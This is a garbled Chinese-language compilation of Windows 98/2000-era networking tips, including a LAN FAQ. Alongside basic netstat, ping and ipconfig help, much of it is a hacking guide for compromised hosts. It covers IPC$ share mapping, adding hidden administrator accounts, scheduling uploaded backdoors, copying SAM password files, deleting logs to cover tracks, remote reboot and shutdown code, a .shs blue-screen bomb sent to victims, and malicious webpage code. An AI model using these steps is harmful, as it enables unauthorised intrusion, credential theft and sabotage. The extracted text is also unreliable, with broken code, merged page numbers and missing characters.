網(wǎng)絡(luò)基礎(chǔ)知識大全

1、網(wǎng)絡(luò)基礎(chǔ)知識大全網(wǎng)絡(luò)基礎(chǔ)知識大全1網(wǎng)絡(luò)常用基礎(chǔ)知識：31)如何查看本機所開端口：32）如何獲得一個IP地址的主機名？33）如何查看本機的ip地址？34）再使用net命令的時候遇到一些錯誤代碼，如何查看對應(yīng)的錯誤信息？45）利用telnet連接到對方主機上，想獲得一些系統(tǒng)信息，用什么命令？46）跟蹤路由器的命令是什么？47）簡單介紹一下cookie！48）安裝2000的時候，速度會特別特別特別慢，怎么加快安裝速度呢？59）Windows2K密碼忘記了，如何才能進入系統(tǒng)？510)ping不到，tracert不到，但是卻能用nbtstat顯示對方的一些信息，為什么？511）telnet上去后，如何給

2、對方開共享？512）如何判斷對方的具體操作系統(tǒng)版本？513）如何查看98的隨機啟動的程序？614）設(shè)置了BIOS密碼，可是卻忘記了，該怎么辦？615）如何自制一個讓98藍屏的炸彈？616）如何再命令行下殺死對方進程？717）上次說了ping的基本用法，這次談?wù)刾ing的命令參數(shù)！718）如何查看本機的DNS服務(wù)器？819）肉雞上的部分文件無法刪除，怎么辦？820）再說一個可以限制用戶登陸時間的命令！822)如何刪除windows2K的默認貢獻？823）139端口的又一用法924）利用批處理文件來建立一個記錄3389登陸者信息的記錄器1025）網(wǎng)絡(luò)命令小節(jié)1026）這里我必須（或者說不得不重新重

3、申一個命令！不過說之前我要把這個命令的相關(guān)命令稍微介紹一下！）1227）關(guān)于雙系統(tǒng)的兩個問題：1228）這里說幾個主頁惡意代碼：并不是讓大家把這些代碼加入到自己的主頁中！只是希望大家能了解惡意代碼，起到更好的防護作用！1329）系統(tǒng)自帶的系統(tǒng)工具1430）批處理在入侵中的幾則妙用！1531）再說幾個非常簡單實用的DOS命令（工具）：1532）ping命令的其他技巧：17局域網(wǎng)應(yīng)用問題專題解答 (Rayi)181、問：我訪問局域網(wǎng)中的計算機時，為什么常常被提示要輸入用戶名和密碼？182、問：上網(wǎng)瀏覽前在局域網(wǎng)中應(yīng)如何對IE進行設(shè)置？183、問：在局域網(wǎng)中應(yīng)如何設(shè)置OutLook Express收

4、發(fā)郵件？184、問：在由三臺電腦組成的局域網(wǎng)中，我在其中一臺電腦上用過Windows優(yōu)化大師后，為什么這臺電腦就不能登錄網(wǎng)絡(luò)，并且還提示找不到撥號適配器？185、問：如何在局域網(wǎng)中設(shè)置QQ、ICQ等即時通訊軟件？186、問：我想用NetMeeting進行局域網(wǎng)中的通話，應(yīng)該如何設(shè)置？197、問：我知道在局域網(wǎng)內(nèi)文件是可以共享的，但我想問的是，打印機和掃描儀應(yīng)該如何共享？198、我用分機線上網(wǎng)，上網(wǎng)速度最大才48000bps，請問是何原因？ 還有，將Modem放在主機箱側(cè)面，開機后（未打開Modem電源），家里的電話就處于忙音狀態(tài)，如何解決？199、我新購的網(wǎng)卡在電腦上無法安裝，而在其他電腦上卻

5、使用正常，這是怎么回事？1910、我的電腦出現(xiàn)“網(wǎng)上鄰居”中找不到其他聯(lián)網(wǎng)電腦的故障，如何解決？2011、問：公司局域網(wǎng)，只有一臺機器通過貓接入互聯(lián)網(wǎng)，現(xiàn)想其他機器接入互聯(lián)網(wǎng)，請問如何實現(xiàn)？2012、問：局域網(wǎng)通過路由器、使用ADSL方式上網(wǎng)，如何使各工作站快速的獲得可以上網(wǎng)的IP地址而不手工去指定？2013、問：公司要組建局域網(wǎng)，需要用到郵件服務(wù)器和WWW服務(wù)器，請問這兩種服務(wù)放到一臺電腦里還是分別用兩臺電腦？都用什么軟件？謝謝！2014、問：家里原先有一臺PII的計算機，最近又新增一臺P4機器，操作系統(tǒng)都為Windows 98且已安裝網(wǎng)卡，現(xiàn)在我想把他們聯(lián)起來共享資源，該怎么辦？2015、

6、問：辦公室機器桌面的“網(wǎng)上鄰居”圖標沒了，能上Internet，但無法瀏覽其他機器上的資源了，怎么辦？2116、問：辦公室機器桌面的網(wǎng)上鄰居圖標解決了且也能瀏覽其他機器的共享資源了，但發(fā)現(xiàn)右鍵中的“共享”命令沒了！怎么辦?2117、問：右鍵中的“共享”命令已經(jīng)顯身！但我設(shè)了共享不想讓別人從網(wǎng)上鄰居中看到這個共享目錄，只有自己知道且能實現(xiàn)異地機上有完全操作的權(quán)限。2118、問：一塊PCI總線的10/100自適應(yīng)網(wǎng)卡，無法正常工作。主要表現(xiàn)在網(wǎng)絡(luò)時斷時續(xù)，不管是不是Ping自己的IP地址，還是Ping對方的IP地址，都有這種情況發(fā)生。查看網(wǎng)卡的指示燈也出現(xiàn)同樣的現(xiàn)象。2119、問：我的電腦與一個對

7、等網(wǎng)連接好了，但不能讀別人電腦上的數(shù)據(jù)，這是怎么回事？2120、問：我的網(wǎng)絡(luò)從集線器升級為交換機后，感覺速度并沒有多大提高，是什么原因？2221、問：VLAN是什么意思，使用它有什么好處？2222、問：我的自適應(yīng)網(wǎng)卡只有紅燈閃爍，綠燈不亮，這種情況正常嗎？2223、問：如何使用交換機的UpLink端口，怎樣連接？使用了UpLink口后，是否還可以使用其相鄰最近的端口？2224、問：我在安裝網(wǎng)卡后，在“系統(tǒng)設(shè)備管理器”中網(wǎng)卡出現(xiàn)黃色的“！”號，請問該如何解決？2325.問：ADSL上網(wǎng)網(wǎng)頁打不開的問題？23網(wǎng)絡(luò)常用基礎(chǔ)知識：1)如何查看本機所開端口：用netstat -a n命令查看！再stat

8、下面有一些英文，我來簡單說一下這些英文具體都代表什么LISTEN：偵聽來自遠方的TCP端口的連接請求SYN-SENT：再發(fā)送連接請求后等待匹配的連接請求SYN-RECEIVED：再收到和發(fā)送一個連接請求后等待對方對連接請求的確認ESTABLISHED：代表一個打開的連接FIN-WAIT-1：等待遠程TCP連接中斷請求，或先前的連接中斷請求的確認FIN-WAIT-2：從遠程TCP等待連接中斷請求CLOSE-WAIT：等待從本地用戶發(fā)來的連接中斷請求CLOSING：等待遠程TCP對連接中斷的確認LAST-ACK：等待原來的發(fā)向遠程TCP的連接中斷請求的確認TIME-WAIT：等待足夠的時間以確保遠

9、程TCP接收到連接中斷請求的確認CLOSED：沒有任何連接狀態(tài)2）如何獲得一個IP地址的主機名？利用ping -a ip 命令查看！再第一行的pinging后面的 ip前面的英文就是對方主機名！同樣道理，利用ping machine_name也可以得到對方的ip獲得一個網(wǎng)站的ip地址的方法是：ping www.*.com比如想知道sohu的ip，就用ping /來查看就可以了順便說一句：如果返回：Reply from *.*.*.*: TTL expired in transit的話，呵呵，代表TTL（生命周期）在傳輸過程中過期什么意思呢？我來解釋一下！導致

10、這個問題出現(xiàn)的原因有兩個：1）TTL值太?。TL值小于你和對方主機之間經(jīng)過的路由器數(shù)目。 2）路由器數(shù)量太多，經(jīng)過路由器的數(shù)量大于TTL值！呵呵，其實這兩點是一個意思！只不過說法不同而已！3）如何查看本機的ip地址？用ipconfig來查看就可以！也可以再Windows中的開始菜單，運行中輸入winipcfg，同樣可以看到自己的ipipconfig命令后面如果加一個參數(shù) /all的話，可以得到更加詳細的資料，比如DNS、網(wǎng)關(guān)等4）再使用net命令的時候遇到一些錯誤代碼，如何查看對應(yīng)的錯誤信息？用命令 net helpmsg erorr_code來查看就可以了比如錯誤代碼為：88則查看命令為：

11、net helpmsg 88 下面有這個錯誤代碼的中文顯示！5）利用telnet連接到對方主機上，想獲得一些系統(tǒng)信息，用什么命令？set命令可以很好的完成你所需要收集信息的任務(wù)的！方法：再cmd下直接輸入set（telnet對方主機以后，也是直接set就可以了然后能夠得到NNNNN多的信息）再這里，computername：呵呵，還用說么？主機名！OSWindows_NT ：操作系統(tǒng)的類型哦pathC:perlbin ：（perl的解釋器位置?。﹕ystemDrive=c: 操作系統(tǒng)盤符！USERNAME=coldcrysky 當前登陸使用機器的用戶6）跟蹤路由器的命令是什么？tracert

12、格式：tracert ip中間會列出所有經(jīng)過的路由器列表！這些路由器如果是暴露再防火墻外面的話，還可以看到路由的IP哦呵呵（這里又涉及到了另外一個問題：為什么要把路由放在防火墻后面？原因呢，主要有兩點：1）保護路由器！因為現(xiàn)在越來越多的攻擊和入侵已經(jīng)開始瞄準路由器了如果直接把路由暴露在外面，呵呵，是非常危險的！被DoS了就不好了啊呵呵，所以要放在防火墻里面；2）為路由器減少負擔！如果所有的過濾功能統(tǒng)統(tǒng)都壓在路由器上面，呵呵，路由器的負擔就太大了?。┊斎?，利用pathping也可以達到同樣效果！格式與tracert一樣！7）簡單介紹一下cookie！cookie，又名小甜點。它的作用：記錄訪問者

13、的一些信息。例如利用cookie記錄你所登陸這個網(wǎng)頁的次數(shù)、登陸時曾經(jīng)輸入的信息最常見的是，大家再登陸論壇（郵箱）的時候，經(jīng)常在輸入第一個字母的時候，往往下面就顯示出了所有在本機登陸過該論壇（郵箱）的用戶名吧？呵呵，這個就是cookie的作用！大家在Administrator的cookies目錄中可以看到很多的記事本文檔吧？這些都是cookie，雖然經(jīng)過了加密，但是仔細查找的話，仍然能夠看到一些敏感信息！況且現(xiàn)在也已經(jīng)有了專門查看cookie的軟件！利用這些軟件，你的隱私將不保哦那么，如何清除cookie呢？一般情況下，可以在Internet選項中的常規(guī)選項卡中看到一個刪除cookies的按鈕

14、，點擊就可以清楚掉了除此以外，還要在internet選項中的內(nèi)容選項卡中找到自動完成按鈕，把里面的四項都選中！然后點擊清除表單，清除密碼然后到操作系統(tǒng)目錄所在的分區(qū)中！進入Winnt（98為windows）目錄（當然了，這些都是默認的目錄！如果你安裝的時候改名了，就對應(yīng)的去相應(yīng)目錄）之后找到Temporary Internet Files目錄（2000的目錄在c:Documents and settingsadministratorLocal settingsTemporary Internet Files）98直接到windows目錄下找Temporary Internet Files就可以

15、了，找到這個文件夾后，打開！看到里面有NNNNNNNNNNNN多的文件了么？呵呵，這些是你瀏覽過的網(wǎng)頁的記錄（有的時候從網(wǎng)站上面看到漂亮的FLASH，可是不能保存怎么辦？只要在線瀏覽一遍以后，斷線到這里來找*.swf，之后依次打開查看的話，相信你會找到你所需要的FLASH的?。?，好了，跑題了繼續(xù)說：這些文件是網(wǎng)站的頁面記錄，直接刪除就可以了！另外，有沒有徹底禁止cookie的方法呢？呵呵，當然有了！在IE的Internet選項中，找到隱私選項卡！，把里面的滑塊拖到最上面，邊上寫著：阻止所有cookie，呵呵，是不是？另外一種方法：找到Windows目錄下的cookies目錄！把里面的txt文件

16、全部刪除！，最后應(yīng)該只剩下一個index.dat文件！之后把這個文件夾設(shè)置成只讀就可以了不過，禁止cookie后，大部分的論壇都無法正常登陸了啊！呵呵，到底禁止不禁止就看你自己的了8）安裝2000的時候，速度會特別特別特別慢，怎么加快安裝速度呢？在DOS上面安裝，應(yīng)該用98啟動光盤來引導系統(tǒng)！然后按照下面的方法來做，可以提高安裝速度：g:cd windows -假設(shè)G為光驅(qū) windows為98的安裝目錄！g:windowssmartdrv -加載smartdrv程序！加載后沒有任何提示信息！只要不返回錯誤信息就是加載成功了這時候安裝2K的話，速度會很快的哦9）Windows2K密碼忘記了，如

17、何才能進入系統(tǒng)？Windows2K的用戶配置信息和密碼保存在SAM文件里！該文件位于：c:winntsystem32config目錄中！只要刪除這個文件就可以了另外，在c:winntrepair目錄中也同樣有一個SAM文件（這個是前者的備份?。┤绻阍诘顷懭怆u的時候，copy前面那個目錄中的SAM文件，你會發(fā)現(xiàn)COPY不下來！呵呵，為什么？因為運行著的2K系統(tǒng)會保護SAM文件啊這個時候你就COPY這個就可以了！10)ping不到，tracert不到，但是卻能用nbtstat顯示對方的一些信息，為什么？因為tracert和ping命令使用的是ICMP協(xié)議！而nbtstat是通過對方的netbio

18、s端口來獲得對方的主機信息的！使用的是UDP和TCP協(xié)議！如果對方僅僅只對ICMP協(xié)議做了禁止的話，那通過這個命令獲得系統(tǒng)信息是正常的！11）telnet上去后，如何給對方開共享？開共享的命令如下：net share c=c:winntsystem 返回共享成功之后直接利用ipc來訪問對方的system目錄了刪除共享用share c /del 命令就可以了12）如何判斷對方的具體操作系統(tǒng)版本？首先用ver命令查看對方的版本號！如果是5.00.2195的話，為2K；5.1.2600為XP從這里可以區(qū)分出來到底是2K還是XP了下面進行更加具體的區(qū)分！2K的pro和svr版本區(qū)分：在telnet下，

19、net shart查看啟動的服務(wù)如果對方開啟了Terminal Services服務(wù)的話，基本上可以判斷為svr以上的版本了如果沒有開啟，則為pro?。ň唧w方法有三種，因為前幾天在論壇中我回復過暗界了所以這里就不再重復了）XP的pro和home版的區(qū)分：home edition是無法安裝iis的！所以，可以通過iis服務(wù)來判斷到底是home版或者是pro了當然了，如果對方是pro，但是將iis刪除（停用）的話，就沒辦法判斷了呵呵13）如何查看98的隨機啟動的程序？在98下有一個實用配置程序（msconfig），中文名為：系統(tǒng)配置實用程序，調(diào)用的方法是在：開始-運行中輸入msconfig，在里面

20、，有一個啟動的選項卡，點擊后，可以看到很多隨即啟動程序，如果前面帶有鉤的話，就是啟動時隨機啟動的，取消的話就是把前面的小鉤去掉就可以了（如果在這里查看到了一些未知的啟動文件-比如沒有文件的具體路徑，或者沒有文件名的話，最好取消它的自啟動！因為很有可能是木馬?。┏诉@里以外，還有config.sys、autoexec.bat、system.ini、win.ini幾個選項卡，他們分別對應(yīng)這幾個文件！只不過在這里更方便查看而已！14）設(shè)置了BIOS密碼，可是卻忘記了，該怎么辦？如果是可以進入Windows的話，可以找找biospwds和cmospwd這兩個軟件看看還有利用DEBUG法：簡單介紹兩種：

21、1）-o 70 16-o 71 13-q2）-o 70 16-o 71 16-q另一種方法：copy法：copy con 輸入下面10個字符：alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格，然后按下F6并回車，退出，運行這個程序就可以了恩，如果不能進入Windows怎么辦呢？簡單介紹兩種方法：1）用通用密碼：Award Bios密碼：j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIO

22、STAR,ALFARO_ME,lkwpeter,awkard,h996,CONCAT,AMI bios密碼：AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.這是常見的密碼，不妨試試如果不行的話，可以利用CMOS放電：就是把主板上的電池取下來，等一會兒再插上去15）如何自制一個讓98藍屏的炸彈？恩，這個是前幾天QQ上面朋友問我的問題，整理的時候突然間想起來了，就寫一下好了首先，打開Word，再插入菜單中選擇對象，這時，彈出對象包裝程序窗口，再這個窗口中，點擊導入，隨便找一個文本或者程序就可以！之后點：編輯菜單。這里選擇命令行，出現(xiàn)一個命令行

23、窗口，在里面協(xié)商c:concon，點擊保存，完成后，再點編輯包中的復制包，把他隨便到一個地方復制下來，之后看到的是一個名位片斷的東西！給這個文件起一個名字，呵呵，傳給那個可憐的家伙吧，等待他藍屏，掉線?。ㄟ@個命令行中可以插入很多的命令，不見得非要用這個98藍屏漏洞哦）順便說一下：這個已經(jīng)不是什么新鮮的技術(shù)了，這個技術(shù)的名字叫做：碎片對象。呵呵，碎片？記憶碎片么？不是的！他的后綴是：.shs！之所以說一下這個，是因為有的朋友還不知道做一個整理而已！不知道的朋友看過后就知道了，知道的朋友就權(quán)當復習了另外，不要利用這個方法做破壞！否則后果自負！16）如何再命令行下殺死對方進程？利用微軟的2K以上操作

24、系統(tǒng)都是含有這個工具的！該工具包含在2K光盤的supporttools文件夾下！里面有安裝程序，點擊后，就安裝了2K的support tools工具包，里面有kill這個工具，這時候再cmd下可以輸入kill/?，就可以看到幫助了，使用這個命令的格式是：kill pid （pid是進程的ID號?。┰偃蝿?wù)管理器中可以看到進程的ID號?。ú恢烙袔孜慌笥延眠^藍色火焰？呵呵，用法跟這個一摸一樣！還有很多類似的木馬、后門軟件都有類似的功能！這個是windows自帶的大木馬后門工具而已?。┻@時候，有朋友問了，那再命令行下如何查看進程呢？呵呵，這就用到了系統(tǒng)自帶的有一個后門工具了：再剛才說得那個目錄中，還

25、有一個工具叫tlist 看名字就能看出來是干什么的吧？用法更簡單！直接輸入tlist就可以得到pid遇隊形程序的列表了那對方機器如果沒有安裝這兩個程序怎么辦呢？沒關(guān)系，你把你操作系統(tǒng)盤符下面programfilessupport tools目錄下面的這兩個對應(yīng)的exe文件上傳到對方的winntsystem32目錄中就可以了！呵呵17）上次說了ping的基本用法，這次談?wù)刾ing的命令參數(shù)！這個是本次問題集的重點部分！無論是小鳥還是老鳥，你們能保證你真的對這些參數(shù)了如指掌么？恐怕都未必！還是好好看看吧！這是TCPIP協(xié)議中最有用的命令之一 它給另一個系統(tǒng)發(fā)送一系列的數(shù)據(jù)包，該系統(tǒng)本身又發(fā)回一個響

26、應(yīng)，這條實用程序?qū)Σ檎疫h程主機很有用，它返回的結(jié)果表示是否能到達主機，宿主機發(fā)送一個返回數(shù)據(jù)包需要多長時間。 Usage： ping -t -a -n count -l size -f -i TTL -v TOS -r count -s count -j host-list -k host-list -w timeout destination-list Options： -t Ping the specifed host until interrupted.（除非人為中止，否則一直ping下去） -a Resolve addresses to hostnames.（把IP轉(zhuǎn)為主機名） -n

27、count Number of echo requests to send.（響應(yīng)請求的數(shù)量） -l size Send buffer size.（封包的大?。?-f Set Dont Fragment flag in packet.（信息包中無碎片） -i TTL Time To Live.（時間） -v TOS Type Of Service.（服務(wù)類型） -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-li

28、st. -k host-list Strict source route along host-list.（較嚴格的唉，怎么譯好算了，放著吧） -w timeout Timeout in milliseconds to wait for each reply.（timeout的時間） 比如大家可能都知道的一個命令 # ping -f -s 65000 *.*.*.*或者前階段大家所謂ping死霉國佬時所用的命令（當然這樣只會造成我方自己的網(wǎng)絡(luò)阻塞）。 其實這個命令主要是用來看對方應(yīng)答的速度，如果怎么ping 得到的結(jié)果都是request time out。那恐怕你根本就不用你去找這臺主機了，它

29、不在你的射程之內(nèi)。18）如何查看本機的DNS服務(wù)器？ipconfig其實是可以的（呵呵，上次就介紹過這個命令），除此以外，還可以利用一個命令：再cmd下輸入netsh，進入到netsh提示符，再輸入：int ip 進入到interface ip 然后再次輸入dump，這時候屏幕上出現(xiàn)當前連接的配置情況了這里必須介紹一下netsh到底是作什么用的！這個命令比較復雜，他包含了很多的子命令，所以這里只對部分命令進行講解：1）查看本機IP：首先鍵入netsh，再netsh提示符下輸入：interface 回車 之后：ip 回車 再之后：show address 回車 這樣，就可以看到當前連接的IP地址

30、和子網(wǎng)掩碼。（其實這個命令不如ipconfig簡單，也不如ipconfig/all全面）2）修改網(wǎng)絡(luò)配置：接著上面的命令，我們使用：set address name=“本地連接” source=static addr=00 mask=，這樣就修改了當前的IP地址，用show address來看看（或者用ipconfig）3）顯示一個完整的網(wǎng)絡(luò)配置教本：剛才說過，第一個命令顯示的信息不如ipconfig/all全面，不用著急，netsh再打印顯示網(wǎng)絡(luò)配置上，還是有自己的特色的！例如：再interface ip狀態(tài)下輸入：dump，會顯示一個清單，顯

31、示所有本地連接（不管你是否使用）與netstat -an不完全一樣！這就是netsh的簡單介紹和最基礎(chǔ)的用法！希望大家能夠掌握！還可以輸入？來查看幫助！（要在netsh提示符下才能查看幫助?。?9）肉雞上的部分文件無法刪除，怎么辦？如果對方的文件夾是只讀的話，會出現(xiàn)拒絕訪問的字樣！這時候，我們可以再del命令后面加上/f參數(shù)來刪除！20）再說一個可以限制用戶登陸時間的命令！再net命令中就可以實現(xiàn)這樣的功能！具體方法如下：假如我們打算讓：coldcrysky這個用戶再周日到周易的上午八點到下午四點之間可以登陸，用這個命令：net user coldcrysky /timesunday-mond

32、ay,08:00-16:00之后利用net user coldcrysky命令來查看登陸時間的限制，可以看到是我們所規(guī)定的時間（因為是中文的，很容易懂，我就不多廢話了）在此，特別提醒各位：命令中：星期日才是一周的開始！不要當成星期一！光說了怎么設(shè)置，如果想恢復回去怎么辦呢？（就是恢復成默認狀態(tài)，任何時間都可以登陸的狀態(tài)）看我的：net user coldcrysky /time:all -這樣就可以了22)如何刪除windows2K的默認貢獻？首先打開記事本，輸入如下內(nèi)容：net share c$ /deletenet share d$ /deletenet share e$ /deleten

33、et share f$ /deletenet share g$ /deletenet share ipc$ /deletenet share admin$ /delete這里的c$、d$、e$是代表默認共享的盤符又幾個就設(shè)置幾個就可以了之后點擊保存成批處理文件（后綴為：bat的文件?。?！加入到啟動組中就可以了23）139端口的又一用法呵呵，寫這個帖子的原因是因為我答應(yīng)給一個朋友回復139端口的作用來著先聲明兩點：1）不要利用本帖所提到的方法去搞惡意破壞！2）呵呵，可能許多人已經(jīng)知道了139端口這個用法了本文只想起到一個拋磚引玉的作用！廢話不多說了開始：如果你使用NT主機的話，那你可要注意了！重

34、啟NT主機的方法如下：1：Net use XXX.XXX.XXX.XXXipc$ password /user:username建立一個IPC連接2：net use H: XXX.XXX.XXX.XXXC$將對方的C盤映射為自己的h盤3：copy c on h:reboot.batIisreset /rebootCTRL+Z在對方的C盤上生成一個能重啟機器的文件4：net time XXX.XXX.XXX.XXX得到對方機器時間5：at XXX.XXX.XXX.XXX 重啟的時間 c:reboot.bat設(shè)定對方重啟的時間！6：at XXX.XXX.XXX.XXX查看任務(wù)上面是否添加了這個任務(wù)

35、7：等對方重啟好了上面的第三步是only for Win2K的，如果是Nt，就需要用意個指定的重啟程序，我們可以自己編寫一個reboot.exe來代替reboot.bat，代碼如下：#include stdio.h#include windows.hint main()文件:/定義重啟的時候發(fā)送給所有用戶的消息LPSTR msg=Reboot Tool By LionHookn;文件:/嘗試用最簡單的API函數(shù)重啟if(ExitWindowXXX(EWX_REBOOT.0)return TRUE;if(ExitWindowXXX(EWX_REBOOT | E

36、WX_FORCE,0)return TRUE;文件:/因為上面的重啟不成功，所以需要調(diào)整本進程的特權(quán)HANDLE hToken;TOKEN_PRIVILEGES tkp;if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken) return FALSE;文件:/獲取重啟的特權(quán) SE_SHUTDOWN_NAMELookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges0.Luid);tkp.PrivilegeCount=1

37、;tkp.Privileges0.Attributes=SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);文件:/判斷是NT內(nèi)核還是9X內(nèi)核，選擇用不同的方式if(!GetVersion()& 0x)InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);else if (!ExitWindowXXX(EWX_REBOOT,0)if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0)return FALS

38、E;return TRUE;對了，再次說明啊，別用本文提到的方法搞破壞，小心警察叔叔打PP呵呵24）利用批處理文件來建立一個記錄3389登陸者信息的記錄器由于Terminal Service默認是沒有日志記錄的，只能依靠他的系統(tǒng)日志，但是系統(tǒng)日志只能記錄一些大動作（開啟或停止服務(wù)），那么，如何用批處理文件來編寫一個將是3389端口的程序呢？很簡單：建立一個批處理文件：內(nèi)容如下：echo offdate/t c:3389log.txt:TS3389time/t c:3389log.txtnetstat -an | find 3389 |find ESTABLISHED c:3389log.txt

39、goto :TS3389之后保存！如果有人用你的3389登陸你的機器，呵呵，在c盤下就有3389log.txt這個文件！記錄了當天日志，還有連接時間資料開始反擊呵呵25）網(wǎng)絡(luò)命令小節(jié)A、NET命令：IPC連接：格式 net use 對方IPipc$ 密碼 user:用戶名 建立IPC連接net use 對方IPipc$ /delete 斷開連接以下操作需要在連接到對方主機后才可進行！net user coldcrysky xyz /add 在連接的目標主機中加入一個用戶名為COLDCRYSKY 密碼為WYZ的用戶net localgroup Administrator coldcrysky /

40、add 把名為coldcrysky的用戶加入ADMIN組-以為著權(quán)限的提高??！_net use z:對方IPC$ 把對方的C盤映射為本機的Z盤-可依照需要更改映射盤符！net start telnet 開啟TELNETnet user guest /active:yes 激活GUESTnet user guest coldcrysky 把GUEST密碼改為COLDCRYSKYB、AT命令：查看遠程機時間：net time 對方IP加入一項新任務(wù)：at 對方IP 時間 文件名 用來把自己上傳的后門程序在制定時間運行，方便以后進入肉雞！C、TELNET命令：telnet 對方IP 端口 作用不用我

41、說了吧？D、FTP命令：登陸：ftp 對方網(wǎng)址（IP地址）上傳文件：get 文件在本機完整路徑 對方文件存放完整路徑下載文件：put 對方文件完整路徑 本機存放文件路徑E、COPY命令：在建立連接后（尤其是IPC$連接后，很有用的命令哦）copy index.htm c$index.htm將本機index.htm文件復制到的C盤下，如果要放到對方的NT目錄下，則把C改為admin$copy adminrepairsam_ c: 將遠程機數(shù)據(jù)庫文件拷貝到本機C盤根目錄下F、SET命令：主要用于分析目標計算機的基本信息用！具體使用方法請查找相關(guān)

42、文件！G、NBTSTAT命令：nbtstat -A 對方IP （這個A大寫）在其中顯示前面的英文或數(shù)字就是計算機名稱！當然，也可以利用PING -A 對方ip的方法來查看對方主機名！效果相同！H、SHUTDOWN命令：用來關(guān)閉對方NT服務(wù)的命令格式如下：shutdown IP地址 t:2020秒后自動關(guān)閉對方NT服務(wù)！由于對對方機器影響較大，慎用！I、DIR命令：還用我說么？大家是不是早就該掌握了？（不知道的還是查閱相關(guān)資料吧）J、ECHO命令：echo coldcrysky index.htm 用coldcrysky覆蓋掉原INDEX.HTM中所有內(nèi)容echo coldcrysky inde

43、x.htm 把coldcrysky加入到index.htm中K、ATTRIB命令：更改文件屬性用，格式：Attrib -r index.htm 去掉只讀屬性（- 分別代表增加和減少）L、DEL命令：刪除日志的時候用！del c:winntsystem32logfiles*.*del c:winntsystem32config*.evtdel c:winntsystem32dtclog*.*del c:winntsystem32*.logdel c:winntsystem32*.txtdel c:winnt*.txtdel c:winnt*.logM、PING命令：-t ：ping制定IP，知道

44、網(wǎng)絡(luò)斷開或按CTRL+C結(jié)束！-a ：解釋PING IP的主機名-n count ：發(fā)送count指定的ECHO數(shù)據(jù)包，默認為4個！26）這里我必須（或者說不得不重新重申一個命令！不過說之前我要把這個命令的相關(guān)命令稍微介紹一下?。┪乙f的命令就是：開啟服務(wù)和停止服務(wù)的net start and net stop這兩個命令大多數(shù)朋友已經(jīng)很熟悉了吧？不過為了方便更多的菜鳥能看明白我要說的意思，不用再看其他相關(guān)文章，所以我簡單說兩句：net start是開啟服務(wù)！那么，如何開啟呢？比如，我們這里要開啟telnet服務(wù)，那就直接再2K的cmd下輸入：net start telnet就OK了關(guān)閉一項服務(wù)

45、的話，把start換成stop就OK了不過這里必須要注意：你所關(guān)閉的服務(wù)必須是已經(jīng)開啟的服務(wù)！好像是一句廢話OK，有了這個前提后，下面就繼續(xù)介紹：那么，net start和net stop到底能開啟什么服務(wù)？其實這點也不需要你強記，記住這個命令就可以了：net help start和net help stop，這兩個會顯示出你所能開啟的服務(wù)有那些這里比如我們查到了這個服務(wù)“CLIENT SERVICE FOR NETWARE”，那么當這個命令使用net start和net stop的時候，你必須在這項服務(wù)上面加上“”，原因是因為這個服務(wù)名稱中帶有空格！如果服務(wù)名稱中不帶空格，你可以不用帶這個引

46、號！這點是我強調(diào)的問題！大家一定不要忘記了！前些天看到S8S8.net的黑白新區(qū)中有人說net start 和 net stop后面的服務(wù)名必須帶空格是錯誤的！明白原因了吧？27）關(guān)于雙系統(tǒng)的兩個問題：A、如何在雙系統(tǒng)（98、2000）中安全刪除2K？先制作一張Windows 98 的啟動軟盤，再用它啟動你的計算機，運行sys命令恢復Windows 98引導記錄后，再運行fdisk/mbr恢復主引導記錄，完成后進入Windows 98，把winnt 和system volumn information 目錄刪除，再刪掉C盤上的boot.ini、bootfont.bin、ntldr、nydete

47、、bootsect.dos文件就行了。B、 Windows 98/XP雙系統(tǒng)啟動菜單修復1.修復前，在BIOS中設(shè)置從光驅(qū)啟動。用Windows XP安裝盤啟動電腦，在加載必要的驅(qū)動后，出現(xiàn)Windows XP的安裝界面。有三個選項：（1）要現(xiàn)在開始安裝Windows XP，請按“Enter”鍵。（2）要用“恢復控制臺”修復Windows XP安裝，按“R”鍵。（3）要退出安裝程序，不安裝Windows XP，按“F3”鍵；2. 按“R”鍵，進入“Microsoft Windows XP (TM) 故障恢復控制臺”界面；故障恢復控制臺提供系統(tǒng)修復和故障恢復功能。系統(tǒng)這時會搜尋已安裝

48、的Windows XP系統(tǒng)文件，然后顯示搜尋結(jié)果，并詢問“要登錄到哪個Windows XP安裝（要取消，請按Enter）”，選擇1. D:Windows，回車，系統(tǒng)會再詢問“管理員密碼”，再鍵入安裝Windows XP時設(shè)置的管理員密碼，回車，出現(xiàn)D:Windows，這時需要輸入修復命令Fixboot，后面的參數(shù)為啟動扇區(qū)要寫入的磁盤盤符，這里填入C:，回車。修復完成，鍵入Exit退出。重啟后就會看到久違的雙重啟動菜單了。并且，這樣修復后基本不產(chǎn)生垃圾文件。因為這兩個問題是非常非常普遍的，所以我就收集到這里了28）這里說幾個主頁惡意代碼：并不是讓大家把這些代碼加入到自己的主頁中！只是希望大家能

49、了解惡意代碼，起到更好的防護作用！A、死循環(huán)代碼：把下列代碼加入到網(wǎng)頁中，可達到如上效果說明：當含有這段代碼的網(wǎng)頁被人點擊，連接就會不斷的打開IE瀏覽器，直到你的系統(tǒng)資源浪費到0只有重新啟動才能正常使用！預(yù)防方法：禁用所有的ActiveX控件和插件！因為這是一個ActiveX教本程序B、恐怖的大圖片：把下列代碼加入到網(wǎng)頁中，可達到如上效果http:/恐怖圖片的連接地址 width= 1 height= 00說明：當打開這樣的網(wǎng)頁，IE會不斷的解釋試圖打開，但由于圖片實在太大，超出了其處理能力，所以C、地震死機代碼：把下列代碼加入到網(wǎng)頁中，可達到如上效果if (window.top.moveBy

